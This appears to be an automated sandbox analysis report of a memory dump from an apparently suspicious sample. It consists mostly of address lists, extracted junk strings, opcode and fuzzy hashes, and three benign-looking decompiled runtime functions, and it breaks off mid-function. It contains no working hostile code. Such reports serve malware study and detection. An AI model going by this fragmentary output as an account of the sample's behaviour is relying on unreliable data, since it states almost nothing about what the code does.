0x0472a73c
0x0472a744
0x0472a74c
0x0472a754
0x0472a76a
0x0472a76f
0x0472a778
0x0472a783
0x0472a78e
0x0472a799
0x0472a7a4
0x0472a7af
0x0472a7ba
0x0472a7c5
0x0472a7d0
0x0472a7d8
0x0472a7e3
0x0472a7ee
0x0472a801
0x0472a804
0x0472a80b
0x0472a816
0x0472a82c
0x0472a833
0x0472a83e
0x0472a846
0x0472a84e
0x0472a856
0x0472a85e
0x0472a866
0x0472a871
0x0472a87c
0x0472a887
0x0472a89a
0x0472a89d
0x0472a8a4
0x0472a8af
0x0472a8ba
0x0472a8c5
0x0472a8d0
0x0472a8d8
0x0472a8e8
0x0472a8ec
0x0472a8f1
0x0472a8f9
0x0472a904
0x0472a90c
0x0472a917
0x0472a922
0x0472a92d
0x0472a938
0x0472a943
0x0472a94e
0x0472a959
0x0472a961
0x0472a969
0x0472a96e
0x0472a976
0x0472a988
0x0472a98d
0x0472a996
0x0472a9a1
0x0472a9b3
0x0472a9b6
0x0472a9bd
0x0472a9ca
0x0472a9d2
0x0472a9da
0x0472a9e2
0x0472a9f0
0x0472a9f5
0x0472a9fb
0x0472aa00
0x0472aa08
0x0472aa10
0x0472aa1b
0x0472aa26
0x0472aa31
0x0472aa3c
0x0472aa47
0x0472aa4f
0x0472aa5a
0x0472aa65
0x0472aa6d
0x0472aa78
0x0472aa84
0x0472aa89
0x0472aa93
0x0472aa98
0x0472aa9e
0x0472aaa6
0x0472aaae
0x0472aab6
0x0472aabe
0x0472aacb
0x0472aace
0x0472aad2
0x0472aada
0x0472aae2
0x0472aaea
0x0472aaf7
0x0472aafb
0x0472ab03
0x0472ab0b
0x0472ab18
0x0472ab1c
0x0472ab24
0x0472ab2c
0x0472ab37
0x0472ab42
0x0472ab4d
0x0472ab58
0x0472ab60
0x0472ab6b
0x0472ab7b
0x0472ab7f
0x0472ab84
0x0472ab8c
0x0472ab94
0x0472ab9c
0x0472aba5
0x0472aba8
0x0472abac
0x0472abb4
0x0472abbb
0x0472abc2
0x0472abc9
0x0472abd4
0x0472abdc
0x0472abe7
0x0472abf2
0x0472abfd
0x0472ac08
0x0472ac08
0x0472ac0e
0x0472ac0e
0x0472ac14
0x0472ac14
0x0472ac20
0x0472ad8b
0x0472ad9e
0x0472ae0c
0x0472ae0f
0x0472ae14
0x0472ae17
0x00000000
0x0472ac26
0x0472ac2c
0x0472af68
0x00000000
0x0472af70
0x0472ac38
0x0472ad22
0x0472ad27
0x0472ad39
0x0472ad4e
0x0472ad4f
0x0472ad50
0x0472ad51
0x0472ad60
0x0472ad79
0x0472ad7e
0x0472ad81
0x00000000
0x0472ac3e
0x0472ac44
0x0472acf3
0x0472ad16
0x0472ad1b
0x00000000
0x0472ac4a
0x0472ac50
0x0472af3a
0x0472af3a
0x0472ac56
0x0472ac5d
0x0472ac74
0x0472ac76
0x0472ac7e
0x0472ac80
0x0472ac82
0x0472ac8b
0x0472ac8d
0x0472ac8f
0x0472ac91
0x0472ac94
0x0472ac94
0x0472ac94
0x0472acaf
0x0472acc8
0x0472accd
0x0472acd2
0x0472acd2
0x0472acd5
0x0472acd5
0x0472acd9
0x0472ac08
0x0472ac08
0x0472ac08
0x0472ac0e
0x0472ac0e
0x00000000
0x0472ac0e
0x00000000
0x0472ac08
0x0472afde
0x00000000
0x0472afde
0x0472ac50
0x0472ac44
0x0472ac38
0x0472ac20
0x0472ae25
0x0472ae30
0x0472ae31
0x0472ae36
0x0472ae3e
0x0472ae40
0x0472ae46
0x00000000
0x0472ae46
0x0472afef
0x00000000
0x0472ae50
0x0472ae50
0x0472ae56
0x0472af07
0x0472af1a
0x0472af20
0x0472af23
0x0472af25
0x0472af31
0x0472af35
0x00000000
0x0472af27
0x0472af27
0x00000000
0x0472af27
0x0472ae5c
0x0472ae5c
0x0472ae62
0x0472aedb
0x0472aef8
0x0472aefd
0x00000000
0x0472ae64
0x0472ae64
0x0472ae6a
0x0472af74
0x0472afad
0x0472afc8
0x0472afcd
0x0472afd7
0x0472afd7
0x0472afd9
0x0472afdb
0x00000000
0x0472afdb
0x0472ae70
0x0472ae76
0x0472aeb9
0x00000000
0x0472ae78
0x0472ae78
0x0472ae7e
0x00000000
0x0472ae84
0x0472aea0
0x0472aea5
0x0472aea9
0x0472aeac
0x0472aeb1
0x00000000
0x0472aeb1
0x0472ae7e
0x0472ae76
0x0472ae62
0x00000000
0x0472ae56

Strings

GH;T, xrefs: 0472AA08
oj:, xrefs: 0472A38C
iL*O, xrefs: 0472A6D9
Me, xrefs: 0472A866
0o, xrefs: 0472AB94
+fz, xrefs: 0472A4CB
!zu, xrefs: 0472AE64
m, xrefs: 0472A70A
!zu, xrefs: 0472AEAC

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: !zu$!zu$+fz$0o$GH;T$Me$iL*O$m$oj:
API String ID: 0-2051750139
Opcode ID: 5dabedb55085c98bc0ee59840270d0c1848c2a8576d3e2e4563f80d0175c3cbb
Instruction ID: 25cd5de5efc088575818960663347e207c5a60e8e1c6eaa50fec8cf5928ba110
Opcode Fuzzy Hash: 5dabedb55085c98bc0ee59840270d0c1848c2a8576d3e2e4563f80d0175c3cbb
Instruction Fuzzy Hash: 49521F715083808BD374CF65C689B8FFBE2BBC4718F10892DE6D99A260D7B19949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0472FA3C, Relevance: 11.7, Strings: 9, Instructions: 447COMMON

Download Yara Rule

Strings

U/, xrefs: 0472FDCF
Jk, xrefs: 047300A5
gl, xrefs: 0472FAA9
zG, xrefs: 0472FB6F
6s%, xrefs: 0472FAB9
-0M, xrefs: 0472FDEA
^e, xrefs: 0472FEEE
o<f, xrefs: 0472FD04
O(x, xrefs: 0472FD5F

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Jk$o<f$-0M$6s%$U/$^e$gl$O(x$zG
API String ID: 0-788119162
Opcode ID: e8542eea573450bd6ca7f72e59d76f828ef9aa359fb4056c1b91a292e2ef99b9
Instruction ID: a1e30f372c493758d22f932dde8f31ef622e3c0e0ff8bc27072a028f45618d9e
Opcode Fuzzy Hash: e8542eea573450bd6ca7f72e59d76f828ef9aa359fb4056c1b91a292e2ef99b9
Instruction Fuzzy Hash: BA321F725093808FE378CF25C54AB9BBBE1BBC5748F00891DE2DA86260D7B19949CF57

Uniqueness

Uniqueness Score: -1.00%

Function 0473313F, Relevance: 10.4, Strings: 8, Instructions: 362COMMON

Download Yara Rule

Strings

`LK, xrefs: 04733264
j 7, xrefs: 047332FC
|>, xrefs: 047334F3
{c, xrefs: 04733182
"@o, xrefs: 047336A8
i9,, xrefs: 0473355E
u, xrefs: 04733195
"@o, xrefs: 04733738

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: {c$"@o$"@o$`LK$i9,$j 7$u$|>
API String ID: 2591292051-2431241743
Opcode ID: 5eba3a1f76836414aea4eb651032bcab54b2923a4a2a2ef9608033bbeb9be29f
Instruction ID: 2fe3f05b5978b10987a00c3bdf6df0a439c95c227e160cbe74118175977fe0ae
Opcode Fuzzy Hash: 5eba3a1f76836414aea4eb651032bcab54b2923a4a2a2ef9608033bbeb9be29f
Instruction Fuzzy Hash: 410230B15083809FD3A8CF61C48AA5BFBF1BBC4748F10891CE6DA86261D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0473A614, Relevance: 10.3, Strings: 8, Instructions: 263COMMON

Download Yara Rule

Strings

4HG, xrefs: 0473AA5C
p~, xrefs: 0473A890
O~, xrefs: 0473A92B
d, xrefs: 0473A770
Rg, xrefs: 0473AB65
Y!uV, xrefs: 0473A7DF
[z, xrefs: 0473A671
{q, xrefs: 0473A798

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 4HG$O~$Y!uV$d$p~$Rg$[z${q
API String ID: 0-2049004569
Opcode ID: bb3c62a24cd31ac3966e8ef32029d48dc028267dc2419bb6ff74cef36b6d3929
Instruction ID: c5f2d707d6f6d5378506376a5c75a01429144a2274464f64479781d6657038fb
Opcode Fuzzy Hash: bb3c62a24cd31ac3966e8ef32029d48dc028267dc2419bb6ff74cef36b6d3929
Instruction Fuzzy Hash: E7D11BB24093818FD7A8CF21C58A95BFBE1BBC4748F508A1DF1E696260D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04738996, Relevance: 9.2, Strings: 7, Instructions: 418COMMON

Download Yara Rule

Strings

}J[{, xrefs: 04738A10
i]8, xrefs: 04738DAE
]*, xrefs: 04738CEB
)`, xrefs: 04738FAA
:O, xrefs: 04738DB9
<, xrefs: 04738E5B
, xrefs: 04739188

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: $)`$:O$]*$i]8$}J[{$<
API String ID: 0-3783902898
Opcode ID: 0d2d3dd0c5dbecf5a6b3ece60dc78e146bd341a527682f3146fb9e1c5698c286
Instruction ID: b2cf3a4135170a1f7408d140aeb74053078e62ef645d922931847b9b133d1c92
Opcode Fuzzy Hash: 0d2d3dd0c5dbecf5a6b3ece60dc78e146bd341a527682f3146fb9e1c5698c286
Instruction Fuzzy Hash: D12233B15083818FD368CF25C489A9BFBE1FBC5358F20891DE6DA86261D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0473DDD1, Relevance: 9.1, Strings: 7, Instructions: 331COMMON

Download Yara Rule

Strings

?oW, xrefs: 0473E066
vE&, xrefs: 0473DFBC
=[E, xrefs: 0473E0DC
I&?, xrefs: 0473DFB4
K(, xrefs: 0473E0AC
u|*, xrefs: 0473E2D1
~oX, xrefs: 0473E285

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: =[E$?oW$I&?$K($u|*$vE&$~oX
API String ID: 0-3214414871
Opcode ID: 60abc6d4f22a92d3231c1cc7bdaf08f2b4b1dd34a574e59e2de4145113323875
Instruction ID: fe996f73f74b89f51e8d29b9af059f67394857c0cc6d08c9f9bc5c9b8be12984
Opcode Fuzzy Hash: 60abc6d4f22a92d3231c1cc7bdaf08f2b4b1dd34a574e59e2de4145113323875
Instruction Fuzzy Hash: 1D02FD715093809FD368CF25C68AA4BFBF2FBC4718F50891EE1998A261D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10003578, Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10003578(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10031c30; // 0x1f496801
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E1000D028(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1000CC36(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x120));
					_t19 = E1000CC8A(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E100127FF(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}

0x10003578
0x1000357e
0x10003585
0x10003589
0x1000358e
0x10003594
0x10003596
0x1000360d
0x10003598
0x10003598
0x1000359e
0x100035ad
0x100035bb
0x100035c1
0x100035cc
0x100035e1
0x100035f0
0x100035f9
0x10003602
0x10003607
0x10003608
0x10003608
0x1000361e

APIs

IsIconic.USER32 ref: 1000358E

Part of subcall function 1000CC36: __EH_prolog3.LIBCMT ref: 1000CC3D
Part of subcall function 1000CC36: BeginPaint.USER32(?,?,00000004,1000D03F,?,00000058,10003612), ref: 1000CC69

SendMessageA.USER32 ref: 100035AD
GetSystemMetrics.USER32 ref: 100035BB
GetSystemMetrics.USER32 ref: 100035C1
GetClientRect.USER32 ref: 100035CC
DrawIcon.USER32 ref: 100035F9

Part of subcall function 1000CC8A: __EH_prolog3.LIBCMT ref: 1000CC91
Part of subcall function 1000CC8A: EndPaint.USER32(?,?,00000004,1000D065,?,?,00000058,10003612), ref: 1000CCAC

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 0cf18b981f0a1e83e91347eba9af5511cabcb5a243a1dfaf33e1376d6ece6eb2
Instruction ID: 0738cc2afba1d90b6ce61ece926ff0d59965f98eec8cc1edf060a23f62077772
Opcode Fuzzy Hash: 0cf18b981f0a1e83e91347eba9af5511cabcb5a243a1dfaf33e1376d6ece6eb2
Instruction Fuzzy Hash: 9B115135600219AFEB11DFB8CD49DAEBBB9FB48340F104515E546DB1A4DB60AD059B10

Uniqueness

Uniqueness Score: -1.00%

Function 0472226A, Relevance: 9.0, Strings: 7, Instructions: 252COMMON

Download Yara Rule

Strings

[, xrefs: 047223F6
p, xrefs: 047224A5
^Ky, xrefs: 04722508
&3C|, xrefs: 047223A2
2j, xrefs: 047223D4
doA, xrefs: 04722554
^C, xrefs: 047222B6

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: p$&3C|$2j$[$^C$^Ky$doA
API String ID: 0-1427947146
Opcode ID: 22e2b156158347903ef792d245c774d62497b6fa7d81b845e86c8563de0b17a6
Instruction ID: 6a7971ec4cafabccb0edbc5ed7cbbc00ea776daba9f5b4d9cedf8f92f2748e4c
Opcode Fuzzy Hash: 22e2b156158347903ef792d245c774d62497b6fa7d81b845e86c8563de0b17a6
Instruction Fuzzy Hash: 81C141B15083429FC368CF25C59941BFBE1BBC4308F50891DF696A6261D3B5EA598F43

Uniqueness

Uniqueness Score: -1.00%

Function 0472CF39, Relevance: 8.9, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

C, xrefs: 0472D08C
1A, xrefs: 0472CF49
Yk?, xrefs: 0472CFC2
)As", xrefs: 0472D1BE
qR, xrefs: 0472D07A
pZ, xrefs: 0472D062
PC, xrefs: 0472CF3F

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: )As"$1A$PC$Yk?$pZ$qR$C
API String ID: 0-807095035
Opcode ID: 9cb27173c6993193ff6ae434da875105f47e7a734c88dbb074324344365cc642
Instruction ID: 95ee86091b496e5869f35a8b44237a7121f5dca6d41fdf47f29644520220e55c
Opcode Fuzzy Hash: 9cb27173c6993193ff6ae434da875105f47e7a734c88dbb074324344365cc642
Instruction Fuzzy Hash: 8D61787160C3009FC368CF25D68942FBBF2EBC4768F10892DF29696660D7B5E9458F46

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFEB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000DFEB(void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				signed int _t37;
				void* _t39;
				void* _t40;
				signed int _t45;
				void* _t46;

				_t36 = __edi;
				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0x10031c30; // 0x1f496801
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E10004908(__edx, _t31, __edi, _t39, E1001551F(__edx,  &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E100161BE(_t49));
					 *(E100161BE(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E100162DA( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E100161BE(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E100161BE(__eflags)) = _t37;
					} else {
						E10006F2D( *((intOrPtr*)(E100161BE(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E100127FF(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}

0x1000dfeb
0x1000dfeb
0x1000dfeb
0x1000dfee
0x1000dff0
0x1000dff6
0x1000dffd
0x1000e000
0x1000e009
0x1000e00b
0x1000e013
0x1000e03b
0x1000e03d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e015
0x1000e023
0x1000e028
0x1000e03f
0x1000e03f
0x1000e045
0x1000e04c
0x1000e055
0x1000e072
0x1000e074
0x1000e079
0x1000e07c
0x1000e092
0x1000e07e
0x1000e085
0x1000e08a
0x1000e094
0x1000e098
0x1000e0ad
0x1000e0ad
0x1000e0ad
0x1000e09e
0x1000e0a5
0x1000e0a5
0x1000e098
0x1000e0b2
0x1000e0b5
0x1000e0bc

APIs

_strcpy_s.LIBCMT ref: 1000E01D

Part of subcall function 100161BE: __getptd_noexit.LIBCMT ref: 100161BE

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000E035
__snwprintf_s.LIBCMT ref: 1000E06A
LoadLibraryA.KERNEL32(?), ref: 1000E0A5

Strings

LOC, xrefs: 1000E015

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1155623865-519433814
Opcode ID: 36440057ed8af91aa3b76c98dc0d761cb1860a9f567fc879671d2d70985324b7
Instruction ID: 858ea6aea02bd0b369b8935984d008f720542018c413732f413d44450e068b2d
Opcode Fuzzy Hash: 36440057ed8af91aa3b76c98dc0d761cb1860a9f567fc879671d2d70985324b7
Instruction Fuzzy Hash: 1A21B775A0021CABE724DB70CC46BDD36ADEF05390F140461F604AB197DA70DD958AA1

Uniqueness

Uniqueness Score: -1.00%

Function 0472D407, Relevance: 7.9, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

NM, xrefs: 0472D839
i#, xrefs: 0472D4FA
Kz, xrefs: 0472D755
SH, xrefs: 0472D5A4
U_, xrefs: 0472D8D0
Tf, xrefs: 0472D6C3

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Kz$NM$SH$Tf$U_$i#
API String ID: 0-1583746451
Opcode ID: fc7a5a0c00cdef54628ead423da1e231e279226fc2aea5a86551a45c02d6ac68
Instruction ID: f882ac4a1ef24e35f1877a11f95f955640179935752815b52dec91bdac1108f0
Opcode Fuzzy Hash: fc7a5a0c00cdef54628ead423da1e231e279226fc2aea5a86551a45c02d6ac68
Instruction Fuzzy Hash: C32200715093819FD368CF65C58AA8BFBF2FBC4748F10891DE1D99A260DBB19949CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0473261D, Relevance: 7.9, Strings: 6, Instructions: 396COMMON

Download Yara Rule

Strings

{p9, xrefs: 047326A4
{Ms, xrefs: 04732C03
~~y, xrefs: 04732A55
9MA, xrefs: 04732C34
I){, xrefs: 0473278B
C3$6, xrefs: 04732B8D

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: 9MA$C3$6$I){${Ms${p9$~~y
API String ID: 0-2340075238
Opcode ID: fd4c774f9ffcca315b8664883fbc4afec54e0dac6f7d3e3e39f2cb30cfa87448
Instruction ID: 7e59334d436f3343d4beea150ce907eee773cfe75a21d2ef9b3f182ece1f9e2b
Opcode Fuzzy Hash: fd4c774f9ffcca315b8664883fbc4afec54e0dac6f7d3e3e39f2cb30cfa87448
Instruction Fuzzy Hash: A72213B2509380DFD368CF21C98AA9BBBF1FBC4748F10891DE19986261D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0472C0E4, Relevance: 7.9, Strings: 6, Instructions: 356COMMON

Download Yara Rule

Strings

1,, xrefs: 0472C572
jf-, xrefs: 0472C344
2u', xrefs: 0472C49B
|QL, xrefs: 0472C656
'9, xrefs: 0472C3AA
Ba, xrefs: 0472C550

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: '9$2u'$Ba$jf-$|QL$1,
API String ID: 0-976989311
Opcode ID: 39abfba1e5cd3f2e07e14b659fbaefeb20a3710d21cfadce84716b85600a1144
Instruction ID: 0c9f7811ac10fc8bf3eb0c20ea1b1727fc926aa6cc73cea5499bb57640b02e65
Opcode Fuzzy Hash: 39abfba1e5cd3f2e07e14b659fbaefeb20a3710d21cfadce84716b85600a1144
Instruction Fuzzy Hash: 1A121F715093819FD368CF25C58AA8BFBE1FBC1748F50891DE29A86260D7B19A49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04726693, Relevance: 7.8, Strings: 6, Instructions: 252COMMON

Download Yara Rule

Strings

_n<J, xrefs: 047267A8
W&, xrefs: 04726757
79, xrefs: 0472680E
LlH, xrefs: 04726A73
#@Uq, xrefs: 04726883
3d, xrefs: 047266F9

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: #@Uq$3d$79$LlH$W&$_n<J
API String ID: 0-2070564660
Opcode ID: 4e738ce11454985f286d4de9be480849db07242195b88aacf04441e613e50d85
Instruction ID: 95ac93e710fc3d78c587f8cc6832d5eb3dcce9c31864139b0e3cdde83e509af9
Opcode Fuzzy Hash: 4e738ce11454985f286d4de9be480849db07242195b88aacf04441e613e50d85
Instruction Fuzzy Hash: 61C101B25083809FD768CF65C98995BFBF1FBC4748F108A1DF6A986220D3B59958CF42

Uniqueness

Uniqueness Score: -1.00%

Function 047284B5, Relevance: 7.7, Strings: 6, Instructions: 166COMMON

Download Yara Rule

Strings

w7, xrefs: 047284CF
,, xrefs: 04728691
'|, xrefs: 0472853C
Yff, xrefs: 047285AD
!wvg, xrefs: 047285A6
YH, xrefs: 047286B5

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID: DeleteFilelstrcmpi
String ID: !wvg$'|$,$YH$Yff$w7
API String ID: 1290836619-1760731524
Opcode ID: 5c56c55ba2d7c067cc97c1c19183a2c68cbb6a01ea396898dc12df63fd2f1c09
Instruction ID: fa89117e0aaff6e9c9f7b77d514c2d19e929cfa138f0d48497e4b13eac5f2782
Opcode Fuzzy Hash: 5c56c55ba2d7c067cc97c1c19183a2c68cbb6a01ea396898dc12df63fd2f1c09
Instruction Fuzzy Hash: 7E8112B2D0120DEBDF48CFE1D98A8EEBBB1FB54318F208119D411B6260D7B95A0ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 100127FF, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E100127FF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10031c30; // 0x1f496801
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x100588f8 = _t6;
				 *0x100588f4 = _t22;
				 *0x100588f0 = _t25;
				 *0x100588ec = _t21;
				 *0x100588e8 = _t27;
				 *0x100588e4 = _t26;
				 *0x10058910 = ss;
